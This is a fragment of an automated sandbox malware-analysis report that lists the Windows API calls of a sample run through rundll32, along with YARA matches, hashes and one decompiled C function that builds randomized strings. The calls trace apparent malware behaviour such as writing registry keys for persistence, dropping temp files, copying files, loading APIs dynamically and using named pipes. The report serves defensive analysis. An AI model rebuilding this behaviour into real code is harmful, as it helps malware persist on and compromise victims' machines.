                          • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057), ref: 05B6C1E2
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,05B785F1,?,00000000,0000001E), ref: 05B6C201
                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?), ref: 05B6C227
                          • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,05B785F1,?,00000000,0000001E,00000001,00000057,?), ref: 05B6C243
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                          • String ID:
                          • API String ID: 3323474148-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,?,00000000), ref: 05B705D3
                          • lstrlen.KERNEL32(?,?,00000000), ref: 05B705DA
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B705F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B70602
                          • lstrcat.KERNEL32(?,?), ref: 05B7061E
                          • lstrcat.KERNEL32(?,?), ref: 05B7062F
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B70640
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B706DD
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 05B70716
                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 05B7072F
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 05B70739
                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05B70749
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B70762
                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05B70772
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                          • String ID:
                          • API String ID: 333890978-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,00000000,?,?,?,05B6663D,?,?), ref: 05B7AFCF
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,05B6663D,?,?), ref: 05B7AFF8
                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05B7B018
                          • lstrcpyW.KERNEL32(-00000002,?), ref: 05B7B034
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B040
                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,05B6663D,?,?), ref: 05B7B043
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,05B6663D,?,?), ref: 05B7B04F
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B06C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B086
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B09C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0B2
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0C8
                          • GetProcAddress.KERNEL32(00000000,?), ref: 05B7B0DE
                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,05B6663D,?,?), ref: 05B7B107
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                          • String ID:
                          • API String ID: 3772355505-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D02D
                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D038
                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D040
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6D055
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B6D066
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B6D078
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D07D
                          • lstrcatW.KERNEL32(00000000,05B853E0), ref: 05B6D089
                          • lstrcatW.KERNEL32(00000000), ref: 05B6D092
                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D097
                          • lstrcatW.KERNEL32(00000000,05B853E0), ref: 05B6D0A3
                          • lstrcatW.KERNEL32(00000000,00000002), ref: 05B6D0BF
                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D0C7
                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,05B71453,?,?,?), ref: 05B6D0D5
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                          • String ID:
                          • API String ID: 3635185113-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B67A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05B67AA6
                            • Part of subcall function 05B67A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05B67ABE
                            • Part of subcall function 05B67A61: WaitForSingleObject.KERNEL32(00000000,?,05B787CC,?,?), ref: 05B67B86
                            • Part of subcall function 05B67A61: HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BAF
                            • Part of subcall function 05B67A61: HeapFree.KERNEL32(00000000,?,?,05B787CC,?,?), ref: 05B67BBF
                            • Part of subcall function 05B67A61: RegCloseKey.ADVAPI32(?,?,05B787CC,?,?), ref: 05B67BC8
                          • lstrcmp.KERNEL32(?,00000000), ref: 05B7E211
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05B6399C,00000000,00000000), ref: 05B7E23D
                          • GetCurrentThreadId.KERNEL32 ref: 05B7E2EE
                          • GetCurrentThread.KERNEL32 ref: 05B7E2FF
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,05B6399C,00000001,76CDF730,00000000,00000000), ref: 05B7E33C
                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,05B6399C,00000001,76CDF730,00000000,00000000), ref: 05B7E350
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B7E35E
                          • wsprintfA.USER32 ref: 05B7E376
                            • Part of subcall function 05B63263: lstrlen.KERNEL32(?,00000000,05B83716,00000000,05B72466,?,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?), ref: 05B6326D
                            • Part of subcall function 05B63263: lstrcpy.KERNEL32(00000000,?), ref: 05B63291
                            • Part of subcall function 05B63263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B63298
                            • Part of subcall function 05B63263: lstrcat.KERNEL32(00000000,?), ref: 05B632EF
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B7E381
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B7E398
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7E3A9
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7E3B5
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                          • String ID:
                          • API String ID: 773763258-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05B65226
                          • memcpy.NTDLL(?,?,00000010), ref: 05B65249
                          • memset.NTDLL ref: 05B65295
                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 05B652A9
                          • GetLastError.KERNEL32 ref: 05B652D7
                          • GetLastError.KERNEL32 ref: 05B6531E
                          • GetLastError.KERNEL32 ref: 05B6533D
                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 05B65377
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 05B65385
                          • GetLastError.KERNEL32 ref: 05B65408
                          • ReleaseMutex.KERNEL32(?), ref: 05B6541A
                          • RtlExitUserThread.NTDLL(?), ref: 05B65430
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                          • String ID:
                          • API String ID: 4037736292-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 05B6DA0C
                          • lstrlen.KERNEL32(?), ref: 05B6DA14
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6DA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6DA43
                          • lstrlen.KERNEL32(?), ref: 05B6DA58
                          • lstrlen.KERNEL32(?), ref: 05B6DA66
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 05B6DAB4
                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05B6DAD8
                          • lstrlen.KERNEL32(?), ref: 05B6DB0B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 05B6DB36
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05B6DB4D
                          • HeapFree.KERNEL32(00000000,?,?), ref: 05B6DB5A
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                          • String ID:
                          • API String ID: 904523553-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 05B7201B
                          • WaitForSingleObject.KERNEL32(000005BC,00000000), ref: 05B7203D
                          • ConnectNamedPipe.KERNEL32(?,?), ref: 05B7205D
                          • GetLastError.KERNEL32 ref: 05B72067
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05B7208B
                          • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 05B720CE
                          • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 05B720D7
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B720E0
                          • CloseHandle.KERNEL32(?), ref: 05B720F5
                          • GetLastError.KERNEL32 ref: 05B72102
                          • CloseHandle.KERNEL32(?), ref: 05B7210F
                          • RtlExitUserThread.NTDLL(000000FF), ref: 05B72125
                          Yara matches
                          Similarity
                          • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                          • String ID:
                          • API String ID: 4053378866-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlImageNtHeader.NTDLL(?), ref: 05B74151
                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,05B709CF,00000094,00000000,00000000,?), ref: 05B74169
                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05B74178
                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,05B709CF,00000094,00000000,00000000,?), ref: 05B7418B
                          • GetTickCount.KERNEL32 ref: 05B7418F
                          • wsprintfA.USER32 ref: 05B741A6
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B741E1
                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 05B74201
                          • lstrlen.KERNEL32(00000000), ref: 05B7420B
                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 05B7421B
                          • RegCloseKey.ADVAPI32(?), ref: 05B74227
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 05B74235
                          Yara matches
                          Similarity
                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                          • String ID:
                          • API String ID: 3778301466-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B650BD
                          • GetCurrentThreadId.KERNEL32 ref: 05B650D3
                          • GetCurrentThread.KERNEL32 ref: 05B650E4
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                            • Part of subcall function 05B80551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,05B6512E,00000020,00000000,?,00000000), ref: 05B805BC
                            • Part of subcall function 05B80551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,05B6512E,00000020,00000000,?,00000000), ref: 05B805E4
                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05B6515E
                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05B6516A
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B651B9
                          • wsprintfA.USER32 ref: 05B651D1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B651DC
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B651F3
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                          • String ID: W
                          • API String ID: 630447368-655174618
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B7B82F
                            • Part of subcall function 05B7447B: RegCloseKey.ADVAPI32(?,?), ref: 05B74502
                          • RegOpenKeyA.ADVAPI32(80000001,05B74833,?), ref: 05B7B86A
                          • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 05B7B8CC
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B7B8E1
                          • lstrcpyW.KERNEL32(?), ref: 05B7B8FB
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B7B90A
                            • Part of subcall function 05B7452B: lstrlenW.KERNEL32(?,?,?,05B6E51D,?,?,?,?,00001000,?,?,00001000), ref: 05B7453E
                            • Part of subcall function 05B7452B: lstrlen.KERNEL32(?,?,05B6E51D,?,?,?,?,00001000,?,?,00001000), ref: 05B74549
                            • Part of subcall function 05B7452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 05B7455E
                          • RegCloseKey.ADVAPI32(05B74833,?,?,05B74833), ref: 05B7B974
                            • Part of subcall function 05B6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2B6
                            • Part of subcall function 05B6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2DE
                            • Part of subcall function 05B6C2AA: memset.NTDLL ref: 05B6C2F0
                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,05B74833), ref: 05B7B9A9
                          • GetLastError.KERNEL32(?,?,05B74833), ref: 05B7B9B4
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B74833), ref: 05B7B9CA
                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,05B74833), ref: 05B7B9DC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                          • String ID:
                          • API String ID: 1430934453-0
                          • Opcode ID: fe2f9fd195f52c73c8d48cfe8b1b479f4ddb6c3b0fdacfe8b21df95461ab29b6
                          • Instruction ID: 9139fb63d3d2fc1ebd41cb30d05befe5ee1141aeb741162190421a2466bdfeb5
                          • Opcode Fuzzy Hash: fe2f9fd195f52c73c8d48cfe8b1b479f4ddb6c3b0fdacfe8b21df95461ab29b6
                          • Instruction Fuzzy Hash: 6C514871910109FBDB11EBA4DC49EBE7BBAFF44354B101096F925A7150EB35BA02DFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 55%
                          			E010062F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				WCHAR* _v24;
                          				signed int _v28;
                          				intOrPtr _v32;
                          				void* __edi;
                          				void* __esi;
                          				WCHAR* _t58;
                          				signed int _t60;
                          				signed int _t62;
                          				intOrPtr _t64;
                          				intOrPtr _t66;
                          				intOrPtr _t70;
                          				void* _t72;
                          				void* _t75;
                          				void* _t76;
                          				WCHAR* _t80;
                          				WCHAR* _t83;
                          				void* _t84;
                          				void* _t85;
                          				void* _t86;
                          				intOrPtr _t92;
                          				signed int _t103;
                          				void* _t104;
                          				intOrPtr _t105;
                          				void* _t107;
                          				intOrPtr* _t115;
                          				void* _t119;
                          				WCHAR* _t125;
                          				signed int _t98;   // temporaries below are used without a declaration in the decompiler output; declared here
                          				signed int _t117;
                          				intOrPtr _t28;
                          				intOrPtr _t44;
                          
                          				_t58 =  *0x100a3dc; // 0x5299c18
                          				_v24 = _t58;
                          				_v28 = 8;
                          				_v20 = GetTickCount();
                          				_t60 = E01007367();
                          				_t103 = 5;
                          				_t98 = _t60 % _t103 + 6;
                          				_t62 = E01007367();
                          				_t117 = _t62 % _t103 + 6;
                          				_v32 = _t62 % _t103 + 6;
                          				_t64 = E0100117A(_t60 % _t103 + 6);
                          				_v16 = _t64;
                          				if(_t64 != 0) {
                          					_t66 = E0100117A(_t117);
                          					_v12 = _t66;
                          					if(_t66 != 0) {
                          						_push(5);
                          						_t104 = 0xa;
                          						_t119 = E010067E7(_t104,  &_v20);
                          						if(_t119 == 0) {
                          							_t119 = 0x100918c;
                          						}
                          						_t70 = E0100659E(_v24);
                          						_v8 = _t70;
                          						if(_t70 != 0) {
                          							_t115 = __imp__; // unresolved import slot; the APIs list below records lstrlen.KERNEL32 at the three call sites that follow
                          							_t72 =  *_t115(_t119);
                          							_t75 =  *_t115(_v8);
                          							_t76 =  *_t115(_a4);
                          							_t80 = E01006D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                          							_v24 = _t80;
                          							if(_t80 != 0) {
                          								_t105 =  *0x100a348; // 0x428d5a8
                          								_t28 = _t105 + 0x100bb30; // 0x530025
                          								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                          								_push(4);
                          								_t107 = 5;
                          								_t83 = E010067E7(_t107,  &_v20);
                          								_a8 = _t83;
                          								if(_t83 == 0) {
                          									_a8 = 0x1009190;
                          								}
                          								_t84 =  *_t115(_a8);
                          								_t85 =  *_t115(_v8);
                          								_t86 =  *_t115(_a4);
                          								_t125 = E01006D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                          								if(_t125 == 0) {
                          									E01006C2C(_v24);
                          								} else {
                          									_t92 =  *0x100a348; // 0x428d5a8
                          									_t44 = _t92 + 0x100bca8; // 0x73006d
                          									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                          									 *_a16 = _v24;
                          									_v28 = _v28 & 0x00000000;
                          									 *_a20 = _t125;
                          								}
                          							}
                          							E01006C2C(_v8);
                          						}
                          						E01006C2C(_v12);
                          					}
                          					E01006C2C(_v16);
                          				}
                          				return _v28;
                          			}

                          APIs
                          • GetTickCount.KERNEL32 ref: 0100630E
                          • lstrlen.KERNEL32(00000000,00000005), ref: 0100638F
                          • lstrlen.KERNEL32(?), ref: 010063A0
                          • lstrlen.KERNEL32(00000000), ref: 010063A7
                          • lstrlenW.KERNEL32(80000002), ref: 010063AE
                          • wsprintfW.USER32 ref: 010063F4
                          • lstrlen.KERNEL32(?,00000004), ref: 01006417
                          • lstrlen.KERNEL32(?), ref: 01006420
                          • lstrlen.KERNEL32(?), ref: 01006427
                          • lstrlenW.KERNEL32(?), ref: 0100642E
                          • wsprintfW.USER32 ref: 01006465
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                          • String ID:
                          • API String ID: 822878831-0
                          • Opcode ID: 4bf31ccc0f4e538e4634c7b04550bc6a6e35f1a5a37b228da9dc5cb3e12e8768
                          • Instruction ID: 927cf494d53ff7b79cb758e6b816b67c2d4c5e5c5affe412dca714ed8ee8019c
                          • Opcode Fuzzy Hash: 4bf31ccc0f4e538e4634c7b04550bc6a6e35f1a5a37b228da9dc5cb3e12e8768
                          • Instruction Fuzzy Hash: EC516072D0021AABEF13AFA4DC44ADE7FB6EF44314F058065F944A7291DB36DA21DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05B75389
                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 05B7539E
                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 05B753C6
                          • HeapFree.KERNEL32(00000000,?), ref: 05B75407
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B75417
                          • RtlAllocateHeap.NTDLL(00000000,05B6DA9D), ref: 05B7542A
                          • RtlAllocateHeap.NTDLL(00000000,05B6DA9D), ref: 05B75439
                          • HeapFree.KERNEL32(00000000,00000000,?,05B6DA9D,00000000,?,?,?), ref: 05B75483
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,05B6DA9D,00000000,?,?,?,?), ref: 05B754A7
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,05B6DA9D,00000000,?,?,?), ref: 05B754CC
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,05B6DA9D,00000000,?,?,?), ref: 05B754E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Allocate$CloseCreate
                          • String ID:
                          • API String ID: 4126010716-0
                          • Opcode ID: 8c10203489845acb23d231993a45f872d683925e554b4a9d54da9d80d50370ce
                          • Instruction ID: bd18871189bcf9c712ad9c069ebf08fdc8c54a4699753718653745315dc94d7a
                          • Opcode Fuzzy Hash: 8c10203489845acb23d231993a45f872d683925e554b4a9d54da9d80d50370ce
                          • Instruction Fuzzy Hash: E951C2B581020DEFDF119F94D8858EEBFBAFB08315F10446AF525A2160D735AA94EF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PathFindFileNameW.SHLWAPI(?), ref: 05B6CEDD
                          • PathFindFileNameW.SHLWAPI(?), ref: 05B6CEF3
                          • lstrlenW.KERNEL32(00000000), ref: 05B6CF36
                          • RtlAllocateHeap.NTDLL(00000000,05B8350B), ref: 05B6CF4C
                          • memcpy.NTDLL(00000000,00000000,05B83509), ref: 05B6CF5F
                          • _wcsupr.NTDLL ref: 05B6CF6B
                          • lstrlenW.KERNEL32(?,05B83509), ref: 05B6CFA4
                          • RtlAllocateHeap.NTDLL(00000000,?,05B83509), ref: 05B6CFB9
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B6CFCF
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B6CFF5
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6D004
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                          • String ID:
                          • API String ID: 3868788785-0
                          • Opcode ID: d547a6b720875944b8217725f78568d6d0a7ab9c70bd1ca1eb997f8802cad5b1
                          • Instruction ID: 6b5a76d91cbf255bb34c962515d19d2a49a1ed3ef7a80a07bb89b7e472634957
                          • Opcode Fuzzy Hash: d547a6b720875944b8217725f78568d6d0a7ab9c70bd1ca1eb997f8802cad5b1
                          • Instruction Fuzzy Hash: B4311332224605BFC730AE749C8997F7FAAFB49220B14095AF656D7180DF39B809CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B6163E
                            • Part of subcall function 05B7447B: RegCloseKey.ADVAPI32(?,?), ref: 05B74502
                          • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 05B6166D
                          • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 05B6167E
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B616B8
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 05B616DA
                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 05B616E3
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B616F9
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05B6170E
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B61722
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05B61737
                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 05B61740
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                          • String ID:
                          • API String ID: 534682438-0
                          • Opcode ID: fcfd9d2303d2616452216e3c1e6028bc1669dee8b2c2812ed8357f37bec6cc22
                          • Instruction ID: 568074caafd3df7fa925e9043e7783ae4049ec522ec84c4077180d1d6060d70b
                          • Opcode Fuzzy Hash: fcfd9d2303d2616452216e3c1e6028bc1669dee8b2c2812ed8357f37bec6cc22
                          • Instruction Fuzzy Hash: 92313675510108BFCB219FA8DC89CBE7FBAFB48350B145052F606E3050EB36BA45EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05B733E4
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094), ref: 05B733F6
                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094), ref: 05B73403
                          • wsprintfA.USER32 ref: 05B7341E
                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,05B6C1F8,00000000,00000094,00000000), ref: 05B73434
                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 05B7344D
                          • WriteFile.KERNEL32(00000000,00000000), ref: 05B73455
                          • GetLastError.KERNEL32 ref: 05B73463
                          • CloseHandle.KERNEL32(00000000), ref: 05B7346C
                          • GetLastError.KERNEL32(?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094,00000000), ref: 05B7347D
